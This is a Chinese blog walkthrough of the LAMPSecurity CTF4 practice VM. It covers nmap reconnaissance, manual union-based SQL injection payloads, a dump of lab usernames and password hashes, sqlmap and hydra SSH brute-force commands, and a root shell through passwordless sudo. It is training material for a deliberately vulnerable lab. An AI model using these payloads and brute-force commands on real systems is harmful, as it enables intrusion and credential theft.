【学渗透靶机——lampSecurityCTF4】

信息收集

主机信息收集

主机ip:

oot@kali:~# nmap -sn 192.168.241.0/24 

在这里插入图片描述

主机开放的端口

root@kali:~# nmap --min-rate 10000 -p- 192.168.241.152

在这里插入图片描述

主机开放端口版本

nmap -sT -sV -O  -p22,25,80  192.168.241.152

在这里插入图片描述
nmap 主机漏洞探测

# nmap --script=vuln -p22,25,80  192.168.241.152

扫描出也没什么有用信息

web 信息收集

访问80 端口

在这里插入图片描述

手工注入测试

1、通过浏览页面发现
http://192.168.241.152/index.html?page=blog&title=Blog&id=2 地址存在注入
在这里插入图片描述

2、使用 order by 判断数据库的列
http://192.168.241.152/index.html?page=blog&title=Blog&id=2 order by 3%20-- -

测试数据库有5列
3、使用联合注入找报错点
在这里插入图片描述

4、查询当前数据库有哪些表

id=-2%20 union select 1,2,group_concat(table_name,''),4,5 from information_schema.tables where table_schema=database() -- -

在这里插入图片描述
5、查询user 表的字段信息

id=-2%20 union select 1,2,group_concat(column_name,''),4,5 from information_schema.columns where table_name='user' -- -

user_id,user_name,user_pass,Host,User,Password,Select_priv,Insert_priv,Update_priv,Delete_priv,Create_priv,Drop_priv,Reload_priv,Shutdown_priv,Process_priv,File_priv,Grant_priv,References_priv,Index_priv,Alter_priv,Show_db_priv,Super_priv,Create_tmp_table_priv,Lock_tables_priv,Execute_priv,Repl_slave_priv,Repl_client_priv,Create_view_priv,Show_view_priv,Create_routine_priv,Alter_routine_priv,Create_user_priv,ssl_type,ssl_cipher,x509_issuer,x509_subject,max_questions,max_updates,max_connections,max_user_connections by 5

在这里插入图片描述
6、查询账号密码

id=-2%20 union select 1,2,group_concat(user_name,'--',user_pass),4,5 from user -- -

----------------
dstevens--02e823a15a392b5aa4ff4ccb9060fa68
achen--b46265f1e7faa3beab09db5c28739380
pmoore--8f4743c04ed8e5f39166a81f26319bb5
jdurbin--7c7bc9f465d86b8164686ebb5151a717
sorzek--64d1f88b9b276aece4b0edcc25b7a434
ghighland--9f3eb3087298ff21843cc4e013cf355f

在这里插入图片描述
通过在线密码破解
在这里插入图片描述

sqlmap 自动化注入

kali@kali:~$ sqlmap -u 'http://192.168.241.152/index.html?page=blog&title=Blog&id=2'  --dbs --batch --dump

在这里插入图片描述

ssh 爆破

root@kali:/root/baji_100/lampSeccurityCTF4# hydra -L user.lst  -P pass.lst  -f -T 10 -vV 192.168.241.152 ssh

在这里插入图片描述

获取系统初始shell

ssh 登录

Unable to negotiate with 192.168.241.152 port 22: no matching key exchange method found. Their offer: diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1
                

在这里插入图片描述

 ssh -oHostKeyAlgorithms=ssh-rsa,ssh-dss  -oKexAlgorithms=diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1   dstevens@192.168.241.152

在这里插入图片描述

提权

发现sudo - l 发现该账号sudo 可执行root 所有命令,并且不需要密码
在这里插入图片描述
直接起个bash
在这里插入图片描述

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Raven: 2是一台中级难度的boot2root虚拟机,目标是获取四个标志(flag)。Raven Security在多次遭受入侵后,采取了额外措施来加固他们的web服务器,以防止黑客入侵。你可以在Vulnhub上找到Raven: 2的ova文件,并使用VirtualBox打开。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [vulnhub靶机raven2](https://blog.csdn.net/weixin_52450702/article/details/127811079)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [vulnhub靶机——RAVEN: 2](https://blog.csdn.net/qq_44029310/article/details/126491848)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)](https://download.csdn.net/download/weixin_38717843/14052717)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值